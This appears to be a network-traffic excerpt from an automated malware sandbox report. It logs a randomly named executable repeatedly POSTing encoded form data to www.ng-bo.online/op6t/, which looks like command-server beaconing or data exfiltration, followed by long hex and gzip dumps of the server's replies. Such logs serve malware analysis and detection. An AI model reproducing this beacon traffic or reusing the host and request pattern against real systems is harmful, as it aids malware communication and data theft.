                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.11.304981737.140.192.90807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:17.446010113 CEST756OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 64 44 73 65 56 30 78 47 71 49 51 39 74 4e 77 57 50 41 76 30 63 55 5a 42 4f 50 34 49 70 57 66 52 39 77 68 36 64 64 64 4e 50 44 4c 5a 4e 6e 4f 6a 37 53 66 63 6e 4b 79 78 51 4a 62 77 74 62 66 2b 62 45 43 51 70 46 45 79 4b 73 47 41 65 73 34 6f 56 6e 61 66 4e 42 6e 67 53 6c 4f 2b 42 76 49 58 47 6e 67 76 41 47 6c 6f 50 76 2f 57 77 55 48 59 76 65 53 54 46 4a 74 2f 4b 35 71 79 6b 6f 5a 31 32 56 2b 73 34 58 61 2b 59 4f 30 51 6f 7a 65 30 4e 37 42 34 49 6f 62 48 52 4e 74 42 59 73 41 75 47 65 6b 32 5a 67 6f 77 67 59 77 57 4e 6b 56 44 77 30 49 63 2f 69 65 55 2f 58 38 41 47 36 4c 4e 6d 51 3d 3d
                                                                        Data Ascii: nvddg=dDseV0xGqIQ9tNwWPAv0cUZBOP4IpWfR9wh6dddNPDLZNnOj7SfcnKyxQJbwtbf+bECQpFEyKsGAes4oVnafNBngSlO+BvIXGngvAGloPv/WwUHYveSTFJt/K5qykoZ12V+s4Xa+YO0Qoze0N7B4IobHRNtBYsAuGek2ZgowgYwWNkVDw0Ic/ieU/X8AG6LNmQ==
                                                                        May 22, 2024 17:33:17.817557096 CEST1289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:33:17 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 a9 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a [TRUNCATED]
                                                                        Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv*trnx71feFg4<`:yvN`:PK}nZ3s@~pcaan8P*|o?W.sp_3Zfge-C}{77A::3g;7V|c173>7|f9+xoxy!HUY"_~iksuvm>5McT+|Xda1[9,\{rdLDAz:*&$?Nu1h+087YSD0f<[Fi53:?3}{9>0}3bV0`-U6`tnQL7)EDpA,lnqsN/[$eP`>Bw,z@pnRTlX;9a pn6ADY;@3%0kL'~pw Wo]Ym*kKq-D2}E%kd6AK\-\`9;!;jU/$8X<K*[IGLU2^>MNH_7&bW1((K3e]<cRDFxZYnWh|Z"r`zc)<8 [TRUNCATED]
                                                                        May 22, 2024 17:33:17.817656040 CEST1289INData Raw: 84 2b 03 04 4f 05 7e 17 e1 31 f8 d8 0c 89 6d ba ce 40 54 29 e8 c6 e4 b2 41 2d 12 99 0c c7 9c 11 9a c0 49 ec c2 d0 f8 fb 97 85 b4 50 16 63 66 4a 4b 70 50 b1 db 97 c8 4a 80 25 f4 11 ff 0f 14 b8 6b 04 13 94 4d 6a 29 0f 05 a1 83 64 9e c9 42 1b 93 d9
                                                                        Data Ascii: +O~1m@T)A-IPcfJKpPJ%kMj)dB3u=Y(!0?9s=xYXRcD]=az2rb(o=k,R~=t`;WswH=F%@sH|[`Ck+gBx>Pv-$h!Wh}
                                                                        May 22, 2024 17:33:17.817990065 CEST1289INData Raw: 7f 50 43 3a c3 8d 67 30 a2 23 fc cf 6d 40 37 ec 8d a4 f9 07 35 9c 33 dc 78 7a a3 39 46 ff bc 06 73 c3 be 88 1b 7f 48 43 39 cb 8a a7 37 92 01 7f 62 20 47 25 c8 71 c4 2b cb c1 b3 bd d1 d9 e8 c5 62 91 7b 0e 66 b4 1b 1f 9d be 1e ce 84 59 69 89 ab b9
                                                                        Data Ascii: PC:g0#m@753xz9FsHC97b G%q+b{fYi}HXCrIx8YQk_27{deG)[<uZ'k er57gIi];'GM9/5C$-D1cK {A!p$:C>io
                                                                        May 22, 2024 17:33:17.818002939 CEST1289INData Raw: 76 21 0a 44 3d a3 f7 b0 93 38 36 c7 21 4d d2 33 f9 0c 3b 29 69 e6 2e 14 28 7a 72 4f a1 94 20 76 27 61 27 3f 98 fc 83 34 1b 9e d7 35 28 b4 e4 d9 bc 82 9d 9c 65 b4 c3 d3 14 3d 97 2f b0 93 96 86 6e 40 91 a6 e7 f3 00 76 2b 6e 46 e3 3f 43 d4 73 d9 fd
                                                                        Data Ascii: v!D=86!M3;)i.(zrO v'a'?45(e=/n@v+nF?Cs{*o`zNku_Eug[k1]9-Sh3RL|llVnSJl}iMzlu@3;c3$=If&}'7Kb7wI_h;9hN)z.~'-M"MgV&}
                                                                        May 22, 2024 17:33:17.818389893 CEST1289INData Raw: f5 60 66 78 e5 2c ff ae aa 5a b0 dc ac ae fd 6a 79 f8 d3 8e 8a 9b 75 69 b5 77 55 d5 36 6b 9c 15 4a eb 7c 5f 55 e7 77 17 bc b7 92 1a a2 d0 fd 5c e7 de da bf cf c6 72 2d 9f bf 73 bf bf 6c a3 95 d8 ab d9 69 2e 3b 8b a5 5c ec f4 9c 25 e4 e7 35 cb b1
                                                                        Data Ascii: `fx,ZjyuiwU6kJ|_Uw\r-sli.;\%5p`$*`Z~f0Fc\my10FqFf_`kYkQx#wN'g?2<&B=@q{ni_S70_m@+\-A>aa>
                                                                        May 22, 2024 17:33:17.818499088 CEST1289INData Raw: 11 fe 21 cd b5 34 f4 e7 34 d7 2a 7b e9 30 e6 da f1 3a a9 02 fc 01 cd 35 96 2e 3a be b9 b6 9a 33 99 6b 99 7e 3c aa b9 c6 d8 a5 07 30 d7 58 7a b7 8d d9 02 3c db c3 5c 3b 36 fd 4f 41 f7 27 63 ae 65 c4 f6 28 e6 1a 5b 77 ed 6f ae b1 74 56 0b 73 ad 9a
                                                                        Data Ascii: !44*{0:5.:3k~<0Xz<\;6OA'ce([wotVsA2J429v,TAoeX$v5iTOaUauRk,]t|{a2xT{K`n%L^;6OA'ce([wotV{AJ29v,TAo`
                                                                        May 22, 2024 17:33:17.818852901 CEST1289INData Raw: 2b 22 cb 9e 06 c7 ea 16 d4 a2 5c d7 79 08 e1 30 ab 8a 09 26 e5 c2 59 a4 2a 00 48 0a 02 1b 0b d4 e4 7b eb da da 5d 06 df d7 b4 b3 10 7d e1 d2 ce 62 d8 f8 9d 85 92 17 17 ed db 1b b4 35 0f 55 d2 c0 d4 1f c0 be 12 6e 95 31 a7 9c 17 d5 54 1d 7f 78 a4
                                                                        Data Ascii: +"\y0&Y*H{]}b5Un1TxpsV5v|n:e3I?>IGRIw+lJzBg<aoEJFh4~TnB4]<~}x)$u0x1wie}u}3ys\_B0B
                                                                        May 22, 2024 17:33:17.818865061 CEST1289INData Raw: 2a f0 6f cc 6b 20 02 28 77 a2 4c 7f 00 5d d8 7c 7e 08 72 2a 0d 71 d8 8e 86 d0 20 18 ce 00 42 19 20 dd 20 bd 02 61 17 b6 65 0c 22 36 e6 47 5a f8 c3 00 a1 19 a1 28 d2 2f 94 55 68 ab 2c a3 e8 49 20 d5 f0 43 a1 1f 44 8c f9 21 2a 05 49 06 3e 08 84 6b
                                                                        Data Ascii: *ok (wL]|~r*q B ae"6GZ(/Uh,I CD!*I>k1^8P9$<Q(n)9'AyMETh~^4@a)*|i3#GCTE~,het# uzx.PF1u@x C#6q
                                                                        May 22, 2024 17:33:17.819367886 CEST1289INData Raw: e3 65 b1 56 48 df 6d be 4a 9e 70 89 10 2e 8e 76 52 3e 0a 3f 73 94 cb e5 6c a1 d4 c9 cc 94 ab 75 94 8f 2a bb 7c 07 e5 65 5d 3e 6a 4c f9 b3 f7 79 8d b0 97 50 be 5b d8 3f 87 3e 7f 66 69 ff 72 fa bc a8 f7 23 f5 7c c3 a8 9b 55 11 4c 51 0c d7 0d 05 b0
                                                                        Data Ascii: eVHmJp.vR>?slu*|e]>jLyP[?>fir#|ULQ>2^^K;4w$`!~tGD_"dkj(!iDNf^&0"26+*T[yfXETI.{5t)Q|mcWNB4mCeie
                                                                        May 22, 2024 17:33:17.819380045 CEST1289INData Raw: 03 e8 67 24 d7 45 b1 96 13 a9 d6 f6 15 ea 5c a7 e7 ed 9d 52 91 d6 58 25 ba 4c a0 9f 4e 9e 43 5b 4e 54 04 85 1c d9 af 10 e8 51 1b 81 1e 1e 5f a0 e5 31 95 68 70 da 40 ba 88 b8 40 73 89 85 33 1a 11 65 0e 77 43 55 1e 6b f2 94 22 df 53 d2 43 25 9e 08
                                                                        Data Ascii: g$E\RX%LNC[NTQ_1hp@@s3ewCUk"SC%zkrsMPO*%!</'RG ` ox>Es[fq#8%z}gE{3)cy)._CX*|J$#C5,a(.i=Z^Z:u0H
                                                                        May 22, 2024 17:33:18.163158894 CEST1289INData Raw: 77 cb 05 38 9c 32 84 22 90 9c 08 e7 81 a4 65 38 04 52 da 96 bc 14 e7 e1 64 c4 38 04 94 93 bf 98 aa 9c 24 17 e9 4a 8b 72 08 2b 27 3b 21 ac 82 30 e7 61 65 a5 39 84 25 97 52 98 17 c3 3c a8 8c 14 46 53 f4 a8 0c 52 51 a4 f3 b0 72 32 1d 42 1b 96 f2 2b
                                                                        Data Ascii: w82"e8Rd8$Jr+';!0ae9%R<FSRQr2B++yH)KvLZ;)#zEA;r'&srjR].KtBF(H2JAP"LP"7C*frV(lFJ`i5 -ZfAdd 8


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.11.304981837.140.192.90807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:20.315660954 CEST776OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 64 44 73 65 56 30 78 47 71 49 51 39 74 75 34 57 49 6d 6e 30 4e 45 5a 41 53 2f 34 49 69 32 66 56 39 77 74 36 64 63 59 49 50 78 76 5a 4d 46 57 6a 71 6a 66 63 70 71 79 78 45 5a 62 78 77 72 66 70 62 45 47 59 70 42 45 79 4b 73 36 41 65 75 77 6f 56 51 75 59 58 78 6e 69 55 6c 4f 38 66 66 49 58 47 6e 67 76 41 47 68 4f 50 76 58 57 77 6b 58 59 74 2f 53 53 62 5a 74 2b 4c 35 71 79 7a 59 5a 78 32 56 2f 4c 34 57 47 55 59 4e 41 51 6f 32 69 30 4d 70 35 35 66 59 61 4d 56 4e 73 4e 58 70 6c 65 41 39 6b 70 58 43 41 70 2b 35 6c 7a 42 54 6b 5a 74 33 38 65 73 43 69 35 6a 57 52 6f 45 34 4b 57 37 51 72 35 59 57 2b 76 48 4f 6f 57 34 72 33 44 71 57 50 65 75 61 59 3d
                                                                        Data Ascii: nvddg=dDseV0xGqIQ9tu4WImn0NEZAS/4Ii2fV9wt6dcYIPxvZMFWjqjfcpqyxEZbxwrfpbEGYpBEyKs6AeuwoVQuYXxniUlO8ffIXGngvAGhOPvXWwkXYt/SSbZt+L5qyzYZx2V/L4WGUYNAQo2i0Mp55fYaMVNsNXpleA9kpXCAp+5lzBTkZt38esCi5jWRoE4KW7Qr5YW+vHOoW4r3DqWPeuaY=
                                                                        May 22, 2024 17:33:20.686563969 CEST1289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:33:20 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 a9 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a [TRUNCATED]
                                                                        Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv*trnx71feFg4<`:yvN`:PK}nZ3s@~pcaan8P*|o?W.sp_3Zfge-C}{77A::3g;7V|c173>7|f9+xoxy!HUY"_~iksuvm>5McT+|Xda1[9,\{rdLDAz:*&$?Nu1h+087YSD0f<[Fi53:?3}{9>0}3bV0`-U6`tnQL7)EDpA,lnqsN/[$eP`>Bw,z@pnRTlX;9a pn6ADY;@3%0kL'~pw Wo]Ym*kKq-D2}E%kd6AK\-\`9;!;jU/$8X<K*[IGLU2^>MNH_7&bW1((K3e]<cRDFxZYnWh|Z"r`zc)<8 [TRUNCATED]
                                                                        May 22, 2024 17:33:20.686599016 CEST1289INData Raw: 84 2b 03 04 4f 05 7e 17 e1 31 f8 d8 0c 89 6d ba ce 40 54 29 e8 c6 e4 b2 41 2d 12 99 0c c7 9c 11 9a c0 49 ec c2 d0 f8 fb 97 85 b4 50 16 63 66 4a 4b 70 50 b1 db 97 c8 4a 80 25 f4 11 ff 0f 14 b8 6b 04 13 94 4d 6a 29 0f 05 a1 83 64 9e c9 42 1b 93 d9
                                                                        Data Ascii: +O~1m@T)A-IPcfJKpPJ%kMj)dB3u=Y(!0?9s=xYXRcD]=az2rb(o=k,R~=t`;WswH=F%@sH|[`Ck+gBx>Pv-$h!Wh}
                                                                        May 22, 2024 17:33:20.686793089 CEST1289INData Raw: 7f 50 43 3a c3 8d 67 30 a2 23 fc cf 6d 40 37 ec 8d a4 f9 07 35 9c 33 dc 78 7a a3 39 46 ff bc 06 73 c3 be 88 1b 7f 48 43 39 cb 8a a7 37 92 01 7f 62 20 47 25 c8 71 c4 2b cb c1 b3 bd d1 d9 e8 c5 62 91 7b 0e 66 b4 1b 1f 9d be 1e ce 84 59 69 89 ab b9
                                                                        Data Ascii: PC:g0#m@753xz9FsHC97b G%q+b{fYi}HXCrIx8YQk_27{deG)[<uZ'k er57gIi];'GM9/5C$-D1cK {A!p$:C>io
                                                                        May 22, 2024 17:33:20.686924934 CEST1289INData Raw: 76 21 0a 44 3d a3 f7 b0 93 38 36 c7 21 4d d2 33 f9 0c 3b 29 69 e6 2e 14 28 7a 72 4f a1 94 20 76 27 61 27 3f 98 fc 83 34 1b 9e d7 35 28 b4 e4 d9 bc 82 9d 9c 65 b4 c3 d3 14 3d 97 2f b0 93 96 86 6e 40 91 a6 e7 f3 00 76 2b 6e 46 e3 3f 43 d4 73 d9 fd
                                                                        Data Ascii: v!D=86!M3;)i.(zrO v'a'?45(e=/n@v+nF?Cs{*o`zNku_Eug[k1]9-Sh3RL|llVnSJl}iMzlu@3;c3$=If&}'7Kb7wI_h;9hN)z.~'-M"MgV&}
                                                                        May 22, 2024 17:33:20.687226057 CEST1289INData Raw: f5 60 66 78 e5 2c ff ae aa 5a b0 dc ac ae fd 6a 79 f8 d3 8e 8a 9b 75 69 b5 77 55 d5 36 6b 9c 15 4a eb 7c 5f 55 e7 77 17 bc b7 92 1a a2 d0 fd 5c e7 de da bf cf c6 72 2d 9f bf 73 bf bf 6c a3 95 d8 ab d9 69 2e 3b 8b a5 5c ec f4 9c 25 e4 e7 35 cb b1
                                                                        Data Ascii: `fx,ZjyuiwU6kJ|_Uw\r-sli.;\%5p`$*`Z~f0Fc\my10FqFf_`kYkQx#wN'g?2<&B=@q{ni_S70_m@+\-A>aa>
                                                                        May 22, 2024 17:33:20.687271118 CEST1289INData Raw: 11 fe 21 cd b5 34 f4 e7 34 d7 2a 7b e9 30 e6 da f1 3a a9 02 fc 01 cd 35 96 2e 3a be b9 b6 9a 33 99 6b 99 7e 3c aa b9 c6 d8 a5 07 30 d7 58 7a b7 8d d9 02 3c db c3 5c 3b 36 fd 4f 41 f7 27 63 ae 65 c4 f6 28 e6 1a 5b 77 ed 6f ae b1 74 56 0b 73 ad 9a
                                                                        Data Ascii: !44*{0:5.:3k~<0Xz<\;6OA'ce([wotVsA2J429v,TAoeX$v5iTOaUauRk,]t|{a2xT{K`n%L^;6OA'ce([wotV{AJ29v,TAo`
                                                                        May 22, 2024 17:33:20.687489033 CEST1289INData Raw: 2b 22 cb 9e 06 c7 ea 16 d4 a2 5c d7 79 08 e1 30 ab 8a 09 26 e5 c2 59 a4 2a 00 48 0a 02 1b 0b d4 e4 7b eb da da 5d 06 df d7 b4 b3 10 7d e1 d2 ce 62 d8 f8 9d 85 92 17 17 ed db 1b b4 35 0f 55 d2 c0 d4 1f c0 be 12 6e 95 31 a7 9c 17 d5 54 1d 7f 78 a4
                                                                        Data Ascii: +"\y0&Y*H{]}b5Un1TxpsV5v|n:e3I?>IGRIw+lJzBg<aoEJFh4~TnB4]<~}x)$u0x1wie}u}3ys\_B0B
                                                                        May 22, 2024 17:33:20.687531948 CEST1289INData Raw: 2a f0 6f cc 6b 20 02 28 77 a2 4c 7f 00 5d d8 7c 7e 08 72 2a 0d 71 d8 8e 86 d0 20 18 ce 00 42 19 20 dd 20 bd 02 61 17 b6 65 0c 22 36 e6 47 5a f8 c3 00 a1 19 a1 28 d2 2f 94 55 68 ab 2c a3 e8 49 20 d5 f0 43 a1 1f 44 8c f9 21 2a 05 49 06 3e 08 84 6b
                                                                        Data Ascii: *ok (wL]|~r*q B ae"6GZ(/Uh,I CD!*I>k1^8P9$<Q(n)9'AyMETh~^4@a)*|i3#GCTE~,het# uzx.PF1u@x C#6q
                                                                        May 22, 2024 17:33:20.687896967 CEST1289INData Raw: e3 65 b1 56 48 df 6d be 4a 9e 70 89 10 2e 8e 76 52 3e 0a 3f 73 94 cb e5 6c a1 d4 c9 cc 94 ab 75 94 8f 2a bb 7c 07 e5 65 5d 3e 6a 4c f9 b3 f7 79 8d b0 97 50 be 5b d8 3f 87 3e 7f 66 69 ff 72 fa bc a8 f7 23 f5 7c c3 a8 9b 55 11 4c 51 0c d7 0d 05 b0
                                                                        Data Ascii: eVHmJp.vR>?slu*|e]>jLyP[?>fir#|ULQ>2^^K;4w$`!~tGD_"dkj(!iDNf^&0"26+*T[yfXETI.{5t)Q|mcWNB4mCeie
                                                                        May 22, 2024 17:33:20.688009024 CEST1289INData Raw: 03 e8 67 24 d7 45 b1 96 13 a9 d6 f6 15 ea 5c a7 e7 ed 9d 52 91 d6 58 25 ba 4c a0 9f 4e 9e 43 5b 4e 54 04 85 1c d9 af 10 e8 51 1b 81 1e 1e 5f a0 e5 31 95 68 70 da 40 ba 88 b8 40 73 89 85 33 1a 11 65 0e 77 43 55 1e 6b f2 94 22 df 53 d2 43 25 9e 08
                                                                        Data Ascii: g$E\RX%LNC[NTQ_1hp@@s3ewCUk"SC%zkrsMPO*%!</'RG ` ox>Es[fq#8%z}gE{3)cy)._CX*|J$#C5,a(.i=Z^Z:u0H
                                                                        May 22, 2024 17:33:21.032489061 CEST1289INData Raw: 77 cb 05 38 9c 32 84 22 90 9c 08 e7 81 a4 65 38 04 52 da 96 bc 14 e7 e1 64 c4 38 04 94 93 bf 98 aa 9c 24 17 e9 4a 8b 72 08 2b 27 3b 21 ac 82 30 e7 61 65 a5 39 84 25 97 52 98 17 c3 3c a8 8c 14 46 53 f4 a8 0c 52 51 a4 f3 b0 72 32 1d 42 1b 96 f2 2b
                                                                        Data Ascii: w82"e8Rd8$Jr+';!0ae9%R<FSRQr2B++yH)KvLZ;)#zEA;r'&srjR].KtBF(H2JAP"LP"7C*frV(lFJ`i5 -ZfAdd 8


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.11.304981937.140.192.90807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:23.189503908 CEST1693OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 64 44 73 65 56 30 78 47 71 49 51 39 74 75 34 57 49 6d 6e 30 4e 45 5a 41 53 2f 34 49 69 32 66 56 39 77 74 36 64 63 59 49 50 78 6e 5a 4e 30 32 6a 37 77 6e 63 71 71 79 78 48 5a 62 30 77 72 66 6f 62 41 71 63 70 42 42 48 4b 70 32 41 66 4e 6f 6f 64 45 79 59 43 68 6e 69 59 46 4f 39 42 76 49 4f 47 6e 77 6a 41 47 78 4f 50 76 58 57 77 69 62 59 71 75 53 53 5a 5a 74 2f 4b 35 71 41 6b 6f 5a 4a 32 56 6e 78 34 57 53 75 59 65 59 51 72 57 53 30 4f 61 42 35 44 49 61 4f 59 74 74 51 58 70 68 42 41 39 34 66 58 42 63 58 2b 37 6c 7a 53 30 6b 50 34 58 41 46 2f 67 71 6b 67 45 74 2f 43 35 71 44 6d 52 72 5a 56 47 6d 44 4f 73 59 64 2b 36 43 66 7a 6b 71 64 30 39 6d 58 58 35 31 32 45 72 75 50 55 52 5a 6e 7a 75 72 52 32 61 4e 77 57 6b 64 68 66 37 65 7a 36 59 35 65 69 6b 4b 33 35 75 32 39 44 64 69 6b 6b 53 52 69 39 43 4c 46 35 2b 41 32 64 35 66 70 48 65 4d 52 32 6a 34 58 51 4c 2f 2b 64 74 62 2f 6b 43 33 64 63 53 52 50 6d 50 6e 47 5a 61 65 4b 7a 43 74 51 56 77 5a 42 4d 57 4d 66 49 6a 38 7a 2f 79 4f 6b 77 4b 33 54 [TRUNCATED]
                                                                        Data Ascii: nvddg=dDseV0xGqIQ9tu4WImn0NEZAS/4Ii2fV9wt6dcYIPxnZN02j7wncqqyxHZb0wrfobAqcpBBHKp2AfNoodEyYChniYFO9BvIOGnwjAGxOPvXWwibYquSSZZt/K5qAkoZJ2Vnx4WSuYeYQrWS0OaB5DIaOYttQXphBA94fXBcX+7lzS0kP4XAF/gqkgEt/C5qDmRrZVGmDOsYd+6Cfzkqd09mXX512EruPURZnzurR2aNwWkdhf7ez6Y5eikK35u29DdikkSRi9CLF5+A2d5fpHeMR2j4XQL/+dtb/kC3dcSRPmPnGZaeKzCtQVwZBMWMfIj8z/yOkwK3To6eQ5dBT/+Xyx70wCW3auAWNyCNOuZ/9tEZdrhFLcOmn83VdqHqjCfHiCALB9np+XBG7IbFUR5HDhxe478Pg2wUnX1KSJmo63Qnk61RQmNRd8SgBHbDdLPFH4IVNdiBGrObfE05UtdC0X+LwB5jLrHoKvphTLXtdrD8IV4+W4A65S745V53dfzsZsrVXmfqCvJ8+wynXUj+Z5hpo9cDo7jlesl7Y1JQIpCkTuAAIln8tOu073D/WfB2Pt8q93LxMEp5k6YyX4Cc1iknISR3FmgepcxP0who5uvUZ8L2I0ysEK3oMt9EzCptY3P+GimNyxIu5ipMgfygWQc+tttLoDP6Ysijx4yyyenwCQNyWP3TYAiQdPuxMyBKAauUm0uZVxxfki0cVxFPBtcioKvUq7LhlbS7seHjg1uIDOwmoiuE/+mkpTXCjd2PIkV46jHggmASyoRjwcl+KVBrIXIvPg6Ra1g3qsitLejX2rHX5pu6unrkCdunogmkpU2JcqFHTkIrFEnBFWqhF12mf+l19isz0GGLM2+CVlAqPNImVnUPgXGr7/NS4UjXPN/XB4qJKqGSYqVGvykPqTDKoGYyUdSnvepB50lWRh8HpwtygANN1ge+Cs3b469UIX+MzKEJk/dGtt0nTImRDb5tkGGxU/xqE4NU/okBxKP [TRUNCATED]
                                                                        May 22, 2024 17:33:23.567965984 CEST1289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:33:23 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
